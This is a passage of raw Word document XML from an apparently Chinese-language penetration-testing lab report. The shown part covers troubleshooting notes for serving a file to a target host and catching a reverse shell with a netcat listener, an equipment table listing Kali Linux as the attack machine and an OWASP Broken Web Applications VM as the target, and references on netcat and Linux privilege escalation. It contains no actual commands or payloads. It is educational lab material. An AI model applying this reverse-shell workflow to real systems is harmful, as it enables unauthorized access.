                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3DF727FA" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C914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標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="afe"/>
              <w:tblW w:w="177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1770"/>
            </w:tblGrid>
            <w:tr w:rsidR="00C91422" w14:paraId="2B625CDD" w14:textId="77777777">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1770" w:type="dxa"/>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="4DC57690" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
                    </w:rPr>
                    <w:t>分析與報告撰寫</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="779148FF" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BAA601E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801" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72360D9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本人</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1EB3C6D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圖文並茂、含流程圖</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21A84A3E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5034EB63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八、遭遇問題與解決方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19371E04" w14:textId="77777777" w:rsidR="00C91422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HTTP Server 卡住</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>：表示伺服器已啟動並在等待目標主機下載檔案，解決方法是確保不要關閉該視窗。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72874C40" w14:textId="77777777" w:rsidR="00C91422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  <w:b/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> listener 無反應</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>：確認目標主機是否執行了反向 shell，並檢查防火牆設置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B853A6C" w14:textId="77777777" w:rsidR="00C91422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ENOENT 錯誤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve">：表示某檔案不存在，使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t>strace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
        </w:rPr>
        <w:t xml:space="preserve"> 跟蹤錯誤來源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F0EC9" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C91422">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F870EC9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九、儀器設備需求表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aff"/>
        <w:tblW w:w="783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5"/>
        <w:gridCol w:w="1041"/>
        <w:gridCol w:w="4655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91422" w14:paraId="27711CF1" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B4EFFB9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設備名稱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50B539B8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需求數量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="537415B2" w14:textId="77777777" w:rsidR="00C91422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具體需求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="7CA3D6FC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="397003C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Kali Linux 虛擬機</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="194D7B9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4655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C8A9C87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用於發起攻擊與控制目標系統</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="137E4CF4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="347B69A0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OWASP虛擬機</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D8FDE23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4655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1349DBB4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作為靶機，供攻擊測試與滲透演練使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91422" w14:paraId="767C30F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2135" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F5AE7D5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網絡連接</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D7CC341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4655" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="065B453F" w14:textId="77777777" w:rsidR="00C91422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需支持內部網絡連接以執行攻擊與通信操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="156E6A17" w14:textId="77777777" w:rsidR="00C91422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十、參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E8B46B" w14:textId="77777777" w:rsidR="00C9142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Offensive Security – Kali Linux Documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.kali.org/docs/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455E5253" w14:textId="77777777" w:rsidR="00C9142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OWASP Broken Web Applications Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-broken-web-applications/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4E8911BE" w14:textId="77777777" w:rsidR="00C9142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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command Guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://linux.die.net/man/1/nc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7B7A8CD2" w14:textId="77777777" w:rsidR="00C9142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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>HackTricks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Linux Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/linux-hardening/privilege-escalation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04185290" w14:textId="493917F5" w:rsidR="00C91422" w:rsidRPr="009701FF" w:rsidRDefault="00000000" w:rsidP="009701F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 w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Linux 實戰攻防：滲透測試與弱點利用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>》</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="標楷體" w:eastAsia="標楷體" w:hAnsi="標楷體" w:cs="標楷體"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，電子工業出版社</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C91422" w:rsidRPr="009701FF">
      <w:footerReference w:type="default" r:id="rId17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FEEE7B" w14:textId="77777777" w:rsidR="000E0D70" w:rsidRDefault="000E0D70">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="453FFBFC" w14:textId="77777777" w:rsidR="000E0D70" w:rsidRDefault="000E0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A10A490-ABD0-4361-B058-03458781F5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1060C9-5EE0-4066-BF3D-D856DB96E17D}"/>
    <w:embedBold r:id="rId3" w:fontKey="{A28A206D-F9E7-43A3-AAE1-2E5A6A98B288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2838BDC-1BD6-4C63-96A2-06BAD776534B}"/>
    <w:embedBold r:id="rId5" w:fontKey="{41CBE3AA-99DA-4FC5-84E2-589074BE5E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E8992D2-0F3D-4D2D-90D4-2EB9E6E662CB}"/>
    <w:embedItalic r:id="rId7" w:fontKey="{10382201-A34F-42F4-A512-EFF4DECB71E8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8" w:subsetted="1" w:fontKey="{568C1A0B-3275-4B4F-9234-E477964170CB}"/>
    <w:embedBold r:id="rId9" w:subsetted="1" w:fontKey="{83B1F6BF-384F-47D4-AAAC-095AF64E16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C09A2" w14:textId="77777777" w:rsidR="00C9142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F67FA2">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri"/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189A7833" w14:textId="77777777" w:rsidR="00C91422" w:rsidRDefault="00C9142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57CC6C" w14:textId="77777777" w:rsidR="000E0D70" w:rsidRDefault="000E0D70">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70EAD930" w14:textId="77777777" w:rsidR="000E0D70" w:rsidRDefault="000E0D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8579D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C62657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1E3583"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40A2FE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7F10FA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24E278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BE40442"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3536CB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EF65A32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="055AB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0421F2B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B4DE58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75B568F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E51279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83E58B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="373EC9A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D2D07EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F90CD5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5444DC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B6EF6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5E5F3F9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E504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0224E54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64BE40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65B63283"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1667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6755672"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="429CC2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6830553E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDBA8EF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0954B34"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="780AAC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73332AFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79F2A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7DD525C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="791A36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08397288">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1541166432">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="877471320">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1310014230">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1273585522">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1136685679">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2087798079">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="66071906">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="175729034">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1607884095">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2022733105">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="584339207">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1967277333">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1252204511">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2122650492">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1099181638">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1616256382">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="105875119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422"/>
    <w:rsid w:val="000E0D70"/>
    <w:rsid w:val="006A1B24"/>
    <w:rsid w:val="009701FF"/>
    <w:rsid w:val="00C91422"/>
    <w:rsid w:val="00F67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9B77D"/>
  <w15:docId w15:val="{7DCD40CF-D125-4DE9-B1E6-163645BBF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180" w:after="180" w:line="720" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri"/>
      <w:b/>
      <w:sz w:val="52"/>
      <w:szCs w:val="5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link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00865F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65F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00865F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65F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B150FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="List Paragraph"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00180746"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D56D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D56D8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="標題 1 字元"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004C370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kali.org/docs/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book.hacktricks.xyz/linux-hardening/privilege-escal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linux.die.net/man/1/nc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owasp.org/www-project-broken-web-application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9NvZnhdyStB2rZgGx4DnQrSLWQ==">CgMxLjA4AHIhMUNNS0FIOHlISTFaU0t5WThtd1Q4Nl9wRjZnbFRmZTdO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905</Words>
  <Characters>5161</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>43</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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CSIE</dc:creator>
  <cp:lastModifiedBy>Enzai Gao</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-26T11:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-18T04:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>